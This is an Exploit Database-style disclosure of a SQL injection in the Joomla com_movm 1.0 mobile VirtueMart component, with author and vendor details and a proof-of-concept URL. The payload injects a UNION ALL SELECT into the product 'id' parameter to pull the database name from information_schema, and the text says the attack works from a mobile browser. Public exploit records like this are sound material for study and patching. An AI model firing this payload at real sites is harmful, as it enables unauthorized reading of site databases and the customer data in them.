Joomla! Component com_movm – SQL Injection

• Exploit Database
• 13 阅读

• 作者： D4NB4R
  日期： 2012-08-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/20170/

• _______________________________________________________________________________________
  
   Exploit Title: Joomla com_movm SQL Injection
   
   Date: [31-07-2012]
   
   Author: Daniel Barragan "D4NB4R"
   
   Twitter: @D4NB4R
   
   site: http://poisonsecurity.wordpress.com/
   
   Vendor: http://www.movm.net/
   
   Version: 1.0 (Date Added 28 July 2012)
   
   License: Commercial $ 49.99 us
  
   Demo: http://www.movm.net/movm-mobile-virtuemart-site-demo/
  
   Tested on: [Linux(bt5)-Windows(7ultimate)]
   
   
   This component was released 3 days ago.be careful when using this component 
   Movm is a joomla extension for mobiles which optimize VirtueMart sites for iphone, android and blackberry. 
   It is compatiblewith Joomla2.5 and VirtueMart 2.0.Have used Jquery mobile, so it gives native effect to Web App.
   This component can be Attacked from a mobile, put the following string in the url field.
   
   p0C
  
   http://server/index.php?option=com_movm&controller=product&task=product&id=999999'+UNION+ALL+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2Cdatabase()+FROM+information_schema.schemata--+D4NB4R%20
  
  
   
  Im not responsible for which is given
  No me hago responsable del uso que se le de
  _______________________________________________________________________________________
  Daniel Barragan "D4NB4R"2012